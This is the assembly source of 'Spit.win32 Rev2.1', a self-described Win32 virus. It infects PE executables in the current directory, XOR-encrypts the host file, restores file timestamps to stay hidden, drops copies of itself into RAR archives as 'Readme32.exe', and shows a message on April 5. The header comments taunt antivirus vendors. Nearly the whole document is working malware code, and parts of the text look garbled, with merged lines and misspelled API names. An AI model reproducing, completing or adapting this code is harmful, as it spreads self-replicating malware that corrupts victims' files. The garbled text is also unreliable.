
;

Spit.win32 Rev2.1

A BumbleBee Win32 Virus

;

, Yeah! It's SIMPLE But Full Win32 Compatible -i Think-. A Non-Resident

Win32 Virus Using Ffirst 'n' FNEXT.

;. Copies INTO HOST: Virus Host. When Host Execs Copies Host To

; Temporary File And Execs It. Then Waits Until Exec Ends To Delete

The TMP File. It's like a spit: Petty But Annoying If Falls over You;)

;

Is My 1st PE Virus and Can Be Improved -See Icons On Infected Files-.

But Spit Uses a Simple Way To Infect!

;

Notes:

- Uses Winexec 'Cause CreateProcess Is More Complex.

; - virus size is 8192 bytes (Code Data HEADERS ...)

; - Marks DOS Header with 'HK' on Infected Files

; - Makes a Semi-Random Name for TMP File

;

What's new on rev2?

;

; - Only Infect PE Files

; - EXEC HOST BEFORE INFECT

; - BEST Random TMP Name

; - Hide Tmp Host With Hidden Attribute While EXEC

; - Encrypts Host -Fuck you avers;

; - no file time change

; - Uses CD13 Routines to Drop over Rar File - Thanx CD13! -

;

;. What's new on rev2.1?

; - a stupid error fixed -winexec 1st push must be 1: (-

;

;

Thanx To ...

;

; ... 29a for e-zines, cd13 for His Cool Stuff, And Lethal for

Find A Bug When I Think IT Was Finished ...

;

;

; The Way of the BEE

;

Yeah Lich ... win32 programing is:

;

; Push Shit

Push moreeshit

; Push toomuchshit

Call Wincoestohell

;

;

Tasm / ml / m3 v32,

; TLINK32 -TPE -C V32, V32, IMPORT32.LIB

;

.386

Locals

Jumps

.Model flat, stdcall

; procs to import

EXTRN EXITPROCESS: PROC

EXTRN CREATEFILEA: PROC

EXTRN WRITEFILE: PROC

EXTRN CLOSEHANDLE: PROC

EXTRN FINDFIRSTFILEA: PROC

EXTRN FINDNEXTFILEA: PROC

EXTRN READFILE: PROC

Extrn getcommandlinea: Procextrn Virtualaloc: Proc

EXTRN VIRTUALFREE: PROC

EXTRN Messageboxa: Proc

EXTRN _LLSEEK: PROC

EXTRN GETFILESIZE: PROC

EXTRN Deletefilea: Proc

EXTRN WINEXEC: PROC

EXTRN LSTRCPY: PROC

EXTRN LSTRCAT: PROC

EXTRN GETSYSTEMTIME: Proc

EXTRN SETFILEATTRIBUTESA: PROC

EXTRN GETFILETIME: Proc

EXTRN SETFILETIME: Proc

; from BC Win32 API ON-LINE REFERENCE

Win32_find_data struct

DWFileAttributes DD 0

DWLOWDATETIME0 DD?; CREATION

DWHIGDATETIME0 DD?

DWLOWDATETIME1 DD?; Last Access

DWHIGDATETIME1 DD?

DWLOWDATETIME2 DD?; Last Write

DWHIGDATETIME2 DD?

NFILESIZEHIGH DD?

NFILESZELOW DD?

DWRESERVED DD 0,0

CFileName DB 260 DUP (0)

CalternateFileName DB 14 DUP (0)

DB 2 DUP (0)

WIN32_FIND_DATA ENDS

Struc from 29a incnad ... Thanx you a lot!

Image_dos_header struct

MZ_MAGIC DW?; MAGIC NUMBER

MZ_CBLP DW?; BYTES ON LAST Page Of File

MZ_CP DW?; Pages In File

MZ_CRLC DW?; Relocations

MZ_CPARHDR DW?; SIZE OF Header in Paragraphs

MZ_MINALLOC DW?; Minimum Extra Paragraphs Needed

MZ_MAXALLOC DW?; Maximum Extra paragraphs needed

MZ_SS DW?; Initial (Relative) SS Value

MZ_SP DW?; Initial SP Value

MZ_CSUM DW?; Checksum

MZ_IP DW?; Initial IP Value

MZ_CS DW?; Initial (Relative) CS Value

MZ_LFARLC DW?; File Address of Relocation Table

MZ_ovno dw?; Overlay number

MZ_RES DW 4 DUP (?); Reserved Words

MZ_OEMID DW?; OEM Identifier (for e_oeminfo)

MZ_OEMINFO DW?; OEM Information; E_OEMID Specific

MZ_RES2 DW 10 DUP (?); Reserved words

MZ_LFANEW DD?; File Address of New Exe HEADER

Image_dos_header ends

Image_sizeof_dos_header EQU SIZE Image_DOS_HEADER

; For Rar Drop

Headersize EQU FinRarheader-Rarheader

Size EQU 8192

.DATA

DOS_HEADER image_DOS_HEADER ; for inf check testfind_data win32_find_data ; for ffirst 'n' Fnext

Fmask: DB '* .exe', 0; Mask for EXE

Ffhnd: DD?; Ff'n'fn Handle

FHND: DD?; File Handle

MHND: DD?; MEMORY HANDLE

MTHND: DD?; TMP MEMORY HANDLE

MTAHND: DD?; TMP MEMORY HANDLE for ARGS

CommandLine: DD?; you know ...

HARGS: DB?; FLAG for HAS ARGS

Argspos: DD?; POS of Args in cmd line

Fsize: DD?; TMP Size Of File

Size2read DD 0; Used for r / w Ops

Titleb DB 'Virus Report Rev2.1', 0

Vid db 'spit.win32 is a bumblebee win32 Virus', 0ah, 0DH

Mess db 0ah, 0dh, 'feel the power of spain and die by the spit!'

DB 0AH, 0DH, 0

TMPHOST DB 'BBBEE'

RNDHOST DB '000000.EXE', 0

Execstatus: DB 0; Status After EXEC

SYSTIMESTRUCT DB 16 DUP (0)

Data for Save Time

STFHND DD?

Time0 DD 0,0

Time1 DD 0,0

Time2 DD 0,0

SERR DB 0

Data for rar Drop by CD13

Dmask: DB '* .rar', 0; Mask for Rar

Number DD 0

Rarheader:; Header That We Will Add

RarheaderCrc DW 0; We'll Fill: CRC of Header

Rartype DB 074H; File Header

RARFLAGS DW 8000H

Rarheadsize dw headersize

RARCOMPRESSED DD SIZE; Compressed and Original

Raroriginal DD Size; Size Are the Same, We Stored

Raros DB 0; OS: MS-DOS

RARCRC32 DD 0; We Must Fill this field

RARFILETIME DB 063H, 078H; Time of the Program

RARFILEDATE DB 031H, 024H; Date of the Proggy

Rarneedver DB 014H

RarMethod DB 030H; Method: Storing

RarfnameSize DW FinRarheader-RarName

RARATTRIB DD 0

Rarname DB "Readme32.exe"; Name of File to Drop

FinRarheader Label Byte

.Code

INICIO:

Lea Eax, SystimeStruct; Check for payload

Push EAX

Call getSystemTime

Lea Eax, SystimeStruct; April 5

CMP Word PTR [EAX 2], 4

JNE SkipPay

CMP Word PTR [EAX 6], 5

JNE SkipPay

Push 1000h; Petty PayLoad

Lea Eax, Titleb

Push EAX

Lea Eax, VID

Push EAX

PUSH 0

Call Messageboxa

SkipPay:

Call getcommandlinea; Get Command Line

Mov DWORD PTR [CommandLine], EAX

Skipargs:; Skip Args

CMP DWORD PTR [EAX], 'EXE.'

Je argsok

INC EAX

JMP Skipargs

Argsok:

Add Eax, 4

CMP Byte Ptr [EAX], 0

JNE Hasargs

Mov Byte Ptr Hargs, 0

JMP Shargs

Hasargs:

MOV BYTE PTR [EAX], 0

Mov Byte Ptr Hargs, 1

Mov DWORD PTR [Argspos], EAX

SHASARGS:

Call Exechoste; Exec Host

Push 00000004h; Read / Write Page

Push 00001000H; MEM Commit (Reserve Phys Mem)

Push 8192; Size to Alloc

Push 0h; Let System Decide Where to Alloc

Call Virtualalloc

CMP EAX, 0

JE JUSTOUT; OPS ... NOT MEMORY TO Alloc?

Mov DWORD PTR [MHND], EAX

XOR EAX, EAX

Push EAX

Push 00000080H

Push 3

Push EAX

Push 00000001H

Push 80000000H

MOV EAX, DWORD PTR [CommandLine]

Push EAX

Call CreateFilea; Open OWN File for Read (Shared)

CMP EAX, -1

JE justout; error: we can't infect ..snif ..

Mov DWORD PTR [FHND], EAX; Save Handle

PUSH 0

Mov DWORD PTR [Size2Read], 0

Lea Eax, Size2Read

Push EAX

PUSH 8192

Push dword PTR [MHND]

Push DWORD PTR [fhnd]

Call readfile; read vx from hoste

Mov Eax, DWORD PTR Size2Read

CMP EAX, 0

Je Justout

MOV EAX, DWORD PTR [MHND]

Add Eax, 12h

MOV Word Ptr [EAX], 'KH'; Infection SIGN

; --only needed in 1st infection-

; But ...

HOWNCLOSE:

MOV Eax, DWORD PTR [fHnd]; Close Own File

Push EAX

Call Closehandle

Lea Eax, Find_Data; Find first * .exe

Push EAX

Lea Eax, Fmask

Push EAX

Call FindfirstFilea

CMP EAX, -1

Je goout

Mov DWORD PTR [ffhnd], EAX

FNEXT:

Call Checkfile; Check File Before Infection Process

JC NOINFECTCALL INFECTFILE

NOINFECT:

Lea Eax, Find_Data; Find next * .exe

Push EAX

MOV EAX, DWORD PTR [ffhnd]

Push EAX

Call FindnextFilea

CMP EAX, 0

JNE FNEXT

MOV Eax, DWORD PTR [ffhnd]; Close FFist / Fnext Handle

Push EAX

Call Closehandle

Goout:

Lea Eax, Find_Data; Find First * .rar

Push EAX

Lea Eax, Dmask

Push EAX

Call FindfirstFilea

CMP EAX, -1

Je Justout

Mov DWORD PTR [ffhnd], EAX

Fnextrar:

Call Savetime

Call Drop

CMP BYTE PTR [SERR], 1

JE FINDNEXTRAR

Call Restoretime

FINDNEXTRAR:

Lea Eax, Find_Data; Find next * .rar

Push EAX

MOV EAX, DWORD PTR [ffhnd]

Push EAX

Call FindnextFilea

CMP EAX, 0

JNE FNEXTRAR

MOV Eax, DWORD PTR [ffhnd]; Close FFist / Fnext Handle

Push EAX

Call Closehandle

Justout:

CMP BYTE PTR [EXECSTATUS], 0; ERROR While EXEC HOST?

JE Skipdelloop

Delloop:

Lea Eax, TMPHOST

Push Eax; Delete TMP HOSTE

Call Deletefilea

CMP EAX, 0

Je Delloop; Wait Until Exec Ends

Skipdelloop:

Push 0h; exit

Call EXITPROCESS

JMP Skipdelloop

Checkfile:; Checks file

Push Edx

Lea Edx, Find_Data.cfileName

Call testifpe

POP EDX

JC Checkerrout

MOV AX, Word PTR DOS_HEADER.MZ_CSUM

CMP AX, 'KH'

Je Checkerrout; Check if it's infected yet

Checkout:

CLC

RET

CheckerRout:

STC

RET

Testifpe:

XOR EAX, EAX

Push EAX

Push 00000080H

Push 3

Push EAX

Push 00000001H

Push 80000000H

Push Edx

Call createfilea; Open file for read (Shared)

CMP EAX, -1

Je Loadherrout

Mov DWORD PTR [FHND], EAX; Save Handle

PUSH 0

Mov DWORD PTR [Size2Read], 0

Lea Eax, Size2Read

Push EAX

Push image_sizeof_dos_header

Lea Eax, Dos_Header

Push EAX

Push DWORD PTR [fhnd]

Call readfile; read dos header

Mov Eax, DWORD PTR Size2Read

CMP EAX, 0

Je Loadherrout

MOV AX, Word PTR [DOS_HEADER.MZ_MAGIC]

Add Al, AHCMP Al, 'M' 'Z'; Check It's A EXE

JNE Loadherrout

PUSH 0

Push DWORD PTR [DOS_HEADER.MZ_LFANEW]

Push DWORD PTR [fhnd]

Call _llseek; lseek to begin of peheader

CMP EAX, -1

Je Loadherrout

PUSH 0

Mov DWORD PTR [Size2Read], 0

Lea Eax, Size2Read

Push EAX

Push 2

Lea Eax, Dos_Header

Push EAX

Push DWORD PTR [fhnd]

Call Readfile; Read PE SIGN

Mov Eax, DWORD PTR Size2Read

CMP EAX, 0

Je Loadherrout

MOV AX, Word PTR [DOS_HEADER.MZ_MAGIC]

Add Al, AH

CMP Al, 'P' 'E'; Check IT's A PE

JNE Loadherrout

Mov Eax, DWORD PTR [FHND]; Close File

Push EAX

Call Closehandle

CLC

RET

Loadherrout:

Mov Eax, DWORD PTR [FHND]; Close File

Push EAX

Call Closehandle

STC

RET

Infectfile:

Call Savetime; Save Time of File

XOR EAX, EAX

Push EAX

Push 00000080H

Push 3

Push EAX

Push 00000001h 00000002H

Push 40000000h OR 80000000H

Lea Eax, Find_Data.cfilename

Push EAX

Call CreateFilea; Open File for r / w (Shared)

CMP EAX, -1

JE inferroutnc

Mov DWORD PTR [FHND], EAX; Save Handle

PUSH 0

Push EAX

Call getFileSize

CMP EAX, -1

JE InferRoutc

Mov DWORD PTR [FSIZE], EAX; Save Size of File

Push 00000004h; Read / Write Page

Push 00001000H; MEM Commit (Reserve Phys Mem)

Push Eax; Size to Alloc

Push 0h; Let System Decide Where to Alloc

Call Virtualalocc; Alloc Memory for Future Hoste

CMP EAX, 0

JE InferRoutc; OPS ... NOT MEMORY TO ALLOC?

Mov DWORD PTR [MTHND], EAX

PUSH 0

Mov DWORD PTR [Size2Read], 0

Lea Eax, Size2Read

Push EAX

Push dword PTR [fsize]

Push DWORD PTR [MTHND]

Push DWORD PTR [fhnd]

Call readfile; read fulure hoste

Mov Eax, DWORD PTR Size2Read

CMP EAX, 0

JE InferRoutc

PUSH 0

PUSH 0

Push DWORD PTR [fhnd]

Call _llseek; Lseek to Begin of File

CMP EAX, -1

JE InferRoutc

PUSH 0

Mov DWORD PTR [Size2Read], 0

Lea Eax, Size2Read

Push EAX

PUSH 8192

Push dword PTR [MHND]

Push DWORD PTR [fhnd]

Call writefile; Write Virii

Call Encrypt; Encrypt Hoste

PUSH 0

Mov DWORD PTR [Size2Read], 0

Lea Eax, Size2Read

Push EAX

Push dword PTR [fsize]

Push DWORD PTR [MTHND]

Push DWORD PTR [fhnd]

Call Writefile; Write Future Hoste

Push 00004000H

Push dword PTR [fsize]

Push DWORD PTR [MTHND]

Call VirtualFree; Free Future Host Mem

InferRoutc:

Mov Eax, DWORD PTR [FHND]; Close File

Push EAX

Call Closehandle

InferRoutnc:

CMP Byte PTR [SERR], 0

JNE SkipRestoretime

Call Restoretime

SkipRestoretime:

RET

EXECHOSTE:

XOR EAX, EAX

Push EAX

Push 00000080H

Push 3

Push EAX

Push 00000001H

Push 80000000H

MOV EAX, DWORD PTR [CommandLine]

Push EAX

Call CreateFilea; Open Host File For Read (Shared)

CMP EAX, -1

JE EXEERROUTNC

Mov DWORD PTR [FHND], EAX; Save Handle

PUSH 0

Push EAX

Call getFileSize

CMP EAX, -1

JE EXEERROUTC

SUB Eax, 8192; Sub Virus Size

Mov DWORD PTR [FSIZE], EAX; Save Size of File

Push 00000004h; Read / Write Page

Push 00001000H; MEM Commit (Reserve Phys Mem)

Push Eax; Size to Alloc

Push 0h; Let System Decide Where to Alloc

Call Virtualalocc; Alloc Memory for Hoste

CMP EAX, 0

JE EXEERROUTC; OPS ... NOT MEMORY TO ALLOC?

Mov DWORD PTR [MTHND], EAX

PUSH 0

PUSH 8192

Push DWORD PTR [fhnd]

Call _llseek; lseek to hoste of file

CMP EAX, -1

JE EXEERROUTC

PUSH 0

Mov DWORD PTR [Size2Read], 0

Lea Eax, Size2Read

Push EAX

MOV EAX, DWORD PTR [fsize]

Push EAX

Push DWORD PTR [MTHND]

Push DWORD PTR [fhnd]

Call readfile; read hoste

Mov Eax, DWORD PTR Size2Read

CMP EAX, 0

JE EXEERROUTC

Mov Eax, DWORD PTR [FHND]; Close File

Push EAX

Call CloseHandlecall ENCRYPT; Dencrypt Hoste

MOV ECX, 6

Mov Edx, Offset Rndhost

Looprnd:

Call Getrandom; Make a Random TMP Name

MOV BYTE PTR [EDX], Al

Inc EDX

Loop looprnd

XOR EAX, EAX

Push EAX

Push 00000020H; Archive

Push 1

Push EAX

Push 00000001h 00000002H

Push 40000000H

Lea Eax, TMPHOST

Push EAX

Call createfilea; Open new file for write (shared)

CMP EAX, -1

JE EXEERROUTNC

PUSH 0

Mov DWORD PTR [Size2Read], 0

Lea Eax, Size2Read

Push EAX

MOV EAX, DWORD PTR [fsize]

Push EAX

Push DWORD PTR [MTHND]

Push DWORD PTR [fhnd]

Call writefile; Write Hoste

Mov Eax, DWORD PTR [FHND]; Close File

Push EAX

Call Closehandle

Push 00004000H

Push dword PTR [fsize]

Push DWORD PTR [MTHND]

Call VirtualFree; Free Future Host Mem

Push 00000004h; Read / Write Page

Push 00001000H; MEM Commit (Reserve Phys Mem)

Push 1024; Size to Alloc

Push 0h; Let System Decide Where to Alloc

Call Virtualalocc; Alloc Memory for Hoste

CMP EAX, 0

JE EXEERROUTNC; OPS ... NOT MEMORY TO ALLOC?

Mov DWORD PTR [MTAHND], EAX

Lea Eax, TMPHOST

Push EAX

MOV EAX, DWORD PTR [MTAHND]

Push EAX

Call lstrcpy; make a commnd line

CMP Byte Ptr [Hargs], 0; IT Has Not Arguments

JE EXECNOW

MOV Eax, DWORD PTR [Argspos]

MOV BYTE PTR [EAX], ''

Push EAX

MOV EAX, DWORD PTR [MTAHND]

Push EAX

Call lstrcat; add arguments

Execnow:

Push 1

MOV EAX, DWORD PTR [MTAHND]

Push Eax; EXEC TMP HOSTE

Call Winexec

MOV BYTE PTR [EXECSTATUS], 1

Push 2

Lea Eax, TMPHOST

Push EAX

Call setFileAttributesa; Hide file

RET

ExeerRoutc:

Mov Eax, DWORD PTR [FHND]; Close File

Push EAX

Call Closehandle

ExeerRoutnc:

RET

Getrandom:

IN Al, 40h

CMP Al, 65

JB Getrandom

CMP Al, 90

Ja Getrandom

RET

ENCRYPT:

MOV EDI, DWORD PTR [MTHND]

MOV EAX, DWORD PTR [fsize]; Use size low byte as ckeymov ECX, DWORD PTR [fsize]

Encryptloop:

XOR BYTE PTR [EDI], Al

Inc EDI

Loop encryptloop

RET

Savetime:

XOR EAX, EAX

Push EAX

Push 00000080H

Push 3

Push EAX

Push 00000001H

Push 80000000H

Lea Eax, Find_Data.cfilename

Push EAX

Call CreateFilea; Open OWN File for Read (Shared)

CMP EAX, -1

Je Saveerr; Error: We can't save time

Mov DWORD PTR [stfhnd], EAX

Lea Eax, Time2

Push EAX

Lea Eax, Time1

Push EAX

Lea Eax, Time0

Push EAX

Push DWORD PTR [stfhnd]

Call getFiletime

MOV EAX, DWORD PTR [stfhnd]; Close File

Push EAX

Call Closehandle

MOV BYTE PTR [SERR], 0

RET

Saveerr:

MOV BYTE PTR [SERR], 1

RET

RESTORETIME:

XOR EAX, EAX

Push EAX

Push 00000080H

Push 3

Push EAX

Push 00000001H

Push 40000000H

Lea Eax, Find_Data.cfilename

Push EAX

Call CreateFilea; Open OWN File for Read (Shared)

CMP EAX, -1

Je Restoreerr; error: We can't restore Time

Mov DWORD PTR [stfhnd], EAX

Lea Eax, Time2

Push EAX

Lea Eax, Time1

Push EAX

Lea Eax, Time0

Push EAX

Push DWORD PTR [stfhnd]

Call setFiletime

MOV EAX, DWORD PTR [stfhnd]; Close File

Push EAX

Call Closehandle

RESTOREERR:

RET

; CD13 Routines Modified for Spit -cool Routines! -

Drop:

XOR EAX, EAX; Open Rar File

Push EAX

Push 00000080H

Push 3

Push EAX

Push EAX

Push 40000000H

Lea Eax, Find_Data.cfilename

Push EAX

Call Createfilea

CMP EAX, -1

Je Droperr

Mov DWORD PTR [FHND], EAX

XOR EAX, EAX

Push 02

Push Eax; Move Pointer to EOF

Push DWORD PTR [fhnd]

Call _llseek

MOV ESI, DWORD PTR [MHND]

Mov EDI, SIZE; GET CRC32 of the Program

Call CRC32; That We'll Drop

Mov DWORD PTR [RARCRC32], EAX; Save the CRC

MOV ESI, Offset Rarheader 2

Mov Edi, Headersize-2

Call CRC32; Get CRC32 of the Headermov Word Ptr [RarheaderCrc], AX

XOR EAX, EAX

Push EAX

Push Offset Number; Number of Bytes Written

Push headersize

Push Offset Rarheader; Write the Header

Push DWORD PTR [fhnd]

Call writefile

Mov Word PTR [RarheaderCrc], 0

Mov Word Ptr [Rarcrc32], 0; Blank There Fields

MOV Word PTR [RARCRC32 2], 0

PUSH 0

Push Offset Number

Push size

Push DWORD PTR [MHND]; Drop The File

Push DWORD PTR [fhnd]

Call writefile

Push DWORD PTR [FHND]; Close IT

Call Closehandle

DROPERR:

RET

CRC32: CLD; ROUTINE EXTRACTED FROM VECNA's

Push Ebx; Inca Virus! Muito Brigado, Friend!

MOV ECX, -1; Calculate CRC32 At Runtime, NO

MOV EDX, ECX; Need of Big Tables.

Nextbytecrc:

XOR EAX, EAX

XOR EBX, EBX

Lodsb

XOR Al, Cl

MOV CL, CH

MOV CH, DL

MOV DL, DH

MOV DH, 8

NextbitCrc:

SHR BX, 1

RCR AX, 1

JNC NOCRC

XOR AX, 08320H

XOR bx, 0edb8h

NOCRC: DEC DH

JNZ nextbitCrc

XOR ECX, EAX

XOR EDX, EBX

Dec di

Jnz nextbytecrc

Not Edx

NOT ECX

POP EBX

MOV EAX, EDX

ROL EAX, 16

MOV AX, CX

RET

ENDS

End inicio
